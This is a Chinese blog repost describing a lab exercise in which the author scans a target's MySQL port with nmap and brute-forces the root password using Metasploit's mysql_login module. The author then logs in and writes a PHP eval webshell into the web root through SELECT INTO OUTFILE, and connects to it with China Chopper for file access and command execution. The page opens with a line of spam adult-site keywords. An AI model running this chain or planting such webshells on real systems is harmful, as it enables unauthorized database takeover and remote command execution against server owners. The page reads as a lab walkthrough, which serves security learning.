国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

利用MySQL暴力破解實現(xiàn)遠程控制

2年前作者:末班 車分類:Toy博客閱讀(13)違法舉報

這篇具有很好參考價值的文章主要介紹了利用MySQL暴力破解實現(xiàn)遠程控制。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、信息收集

利用nmap工具掃描靶機3306端口開啟情況

nmap -sV 192.168.180.133 -p 3306
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

發(fā)現(xiàn)靶機開啟3306端口,MySQL數(shù)據(jù)庫

二、滲透測試

打開msfconsole滲透測試平臺

mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

搜索mysql_login漏洞模塊

search mysql_login
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

使用auxiliary/scanner/mysql/mysql_login漏洞攻擊模塊

use 0
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

查看需要配置的參數(shù)

show options
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

設置密碼字典

set pass_file /pass.txt
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

設置目標IP

set rhosts 192.168.180.133
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

設置爆破用戶名

set username root
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

運行

exploit
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

成功爆破出密碼 P@sswrd

三、遠程登錄

使用我們爆破出的用戶名密碼遠程登錄MySQL數(shù)據(jù)庫

mysql -h 192.168.180.133 -u root -p
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

登錄成功后寫入一句話木馬到/var/www目錄中

select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

寫入成功后使用中國菜刀連接

mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

雙擊進入

mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

連接成功,可看到系統(tǒng)文件及信息

右擊也可以打開虛擬終端,執(zhí)行命令

mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔
mysql 漏洞利用工具,學習,安全,網(wǎng)絡,Powered by 金山文檔

實驗結(jié)束文章來源地址http://www.zghlxwxcb.cn/news/detail-728238.html

到了這里,關于利用MySQL暴力破解實現(xiàn)遠程控制的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 如何在局域網(wǎng)中進行遠程桌面登入實現(xiàn)遠程控制電腦

    要遠程控制本地桌面電腦,就必須要獲得本地電腦權限。所有的遠程控制軟件都是一個原理哦,只是有些遠程控制軟件把獲得權限的設置偽裝成一個木馬而已,當你點擊后就證明你允許它遠程控制電腦,受理他所有的權限,那么他就可以為所欲為了。其實正規(guī)的獲取本地電腦

    2024年02月06日
    瀏覽(35)
  • 分分鐘穿透手機,實現(xiàn)遠程控制

    分分鐘穿透手機,實現(xiàn)遠程控制

    大家好,我是鳥哥。一個半路出家的程序員。 之前給大家分過一篇文章——一行命令就把女友們的手機徹底監(jiān)控了~我可以為所欲為了...,教大家使用Scrcpy實現(xiàn)電腦對手機的無線監(jiān)控(更確切的說應該是投屏),但是受限于只能在局域網(wǎng)下使用,這就非常雞肋了。不過在文末

    2024年02月04日
    瀏覽(44)
  • 微信小程序?qū)崿F(xiàn)遠程控制門鎖

    微信小程序?qū)崿F(xiàn)遠程控制門鎖

    微信小程序?qū)崿F(xiàn)遠程控制門鎖呢? 本文描述了使用微信小程序調(diào)用HTTP接口,實現(xiàn)控制門鎖。通過智能出門開關,配合普通的電插鎖、電磁鎖,來實現(xiàn)門禁控制。 可選用產(chǎn)品:可根據(jù)實際場景需求,選擇對應的規(guī)格 序號 設備名稱 1 智能WiFi墻壁出門開關 2 智能WiFi觸摸墻壁出門

    2024年04月23日
    瀏覽(18)
  • 利用暴力攻擊破解登陸密碼

    利用暴力攻擊破解登陸密碼

    長久以來,入侵遠程計算機系統(tǒng)的工具和技術并沒有發(fā)生翻天覆地的變化。例如,在許多情況下,普通用戶只要知道了相關密碼,就能立刻變身為管理員。雖然這些情形聽起來不夠曲折,但在大多數(shù)情況下,暴力攻擊是通過利用密碼管理缺陷來入侵系統(tǒng)的最簡單實用的方法。

    2024年02月05日
    瀏覽(26)
  • 怎樣用PHP語言實現(xiàn)遠程控制三路開關

    怎樣用PHP語言實現(xiàn)遠程控制三路開關

    怎樣用PHP語言實現(xiàn)遠程控制三路開關呢? 本文描述了使用PHP語言調(diào)用HTTP接口,實現(xiàn)控制三路開關,三路開關可控制三路照明、排風扇等電器。 可選用產(chǎn)品:可根據(jù)實際場景需求,選擇對應的規(guī)格 序號 設備名稱 廠商 1 智能WiFi墻壁開關3路 統(tǒng)軟云物聯(lián) 2 智能WiFi觸摸墻壁開關

    2024年04月24日
    瀏覽(27)
  • thingsboard+ESP8266+MQTT實現(xiàn)設備遠程控制

    thingsboard+ESP8266+MQTT實現(xiàn)設備遠程控制

    本次主要想實現(xiàn)功能:thingsboard平臺遠程控制設備 設備(ESP8266上的燈作為一臺設備,模擬控制燈的開關) 指令傳輸通過thingsboard平臺集成的MQTT協(xié)議 利用thingsboard儀表盤庫的一個控制組件模擬發(fā)送指令來控制我們的 燈的開關 之前搭建好的thingsboard平臺 NodeMCU開發(fā)板 開發(fā)NodeMC

    2023年04月19日
    瀏覽(42)
  • STM32+ESP8266實現(xiàn)遠程控制LED

    STM32+ESP8266實現(xiàn)遠程控制LED

    上次學會了串口調(diào)試助手配置ESP8266之后,嘗試用STM32的串口來配置ESP8266,參考了以下幾篇文章 文章1,點擊跳轉(zhuǎn) 文章2,點擊跳轉(zhuǎn) ESP8266 STM32 3V3 3.3 GND GND RX PB10 TX PB11 然后STM32f103C8T6核心板自帶了一個LED接的是PB13引腳。 這里值得一提的是,剛開始我把ESP8266的3V3引腳接到了USB轉(zhuǎn)

    2023年04月26日
    瀏覽(23)
  • Android MQTT:實現(xiàn)設備信息上報與遠程控制

    Android MQTT:實現(xiàn)設備信息上報與遠程控制

    1.1 MQTT是什么? MQTT(Message Queuing Telemetry Transport)是一種輕量級的消息傳輸協(xié)議,最初由IBM開發(fā),用于連接遠程設備與服務器之間的通信。它在物聯(lián)網(wǎng)(IoT)應用中變得越來越流行,因為它具有以下特點: 輕量級協(xié)議 :MQTT是一種精簡的協(xié)議,有效地減少了通信開銷,適合于

    2024年02月09日
    瀏覽(23)
  • 如何通過VNC實現(xiàn)公網(wǎng)遠程控制macOS設備

    如何通過VNC實現(xiàn)公網(wǎng)遠程控制macOS設備

    macOS系統(tǒng)自帶有VNC遠程桌面,我們可以在控制端上安裝配置VNC客戶端,以此來實現(xiàn)遠程控制macOS。但通常需要在不同網(wǎng)絡下進行遠程控制,為此,我們可以在macOS被控端上使用cpolar做內(nèi)網(wǎng)穿透,映射VNC默認端口5900,通過所生成的公網(wǎng)地址,來實現(xiàn)在公網(wǎng)環(huán)境下遠程控制VNC。 1

    2024年02月08日
    瀏覽(17)
  • win10遠程桌面控制Ubuntu服務器 - 內(nèi)網(wǎng)穿透實現(xiàn)公網(wǎng)遠程

    win10遠程桌面控制Ubuntu服務器 - 內(nèi)網(wǎng)穿透實現(xiàn)公網(wǎng)遠程

    轉(zhuǎn)載自遠程穿透文章:Windows通過RDP異地遠程桌面Ubuntu【內(nèi)網(wǎng)穿透】 XRDP是一種開源工具,它允許用戶通過Windows RDP訪問Linux遠程桌面。 除了Windows RDP外,xrdp工具還接受來自其他RDP客戶端(如FreeRDP、rdesktop和NeutrinoRDP )的連接。 相較于VNC,xrdp更加的輕量級。下面簡單幾步實現(xiàn)ubu

    2024年02月03日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包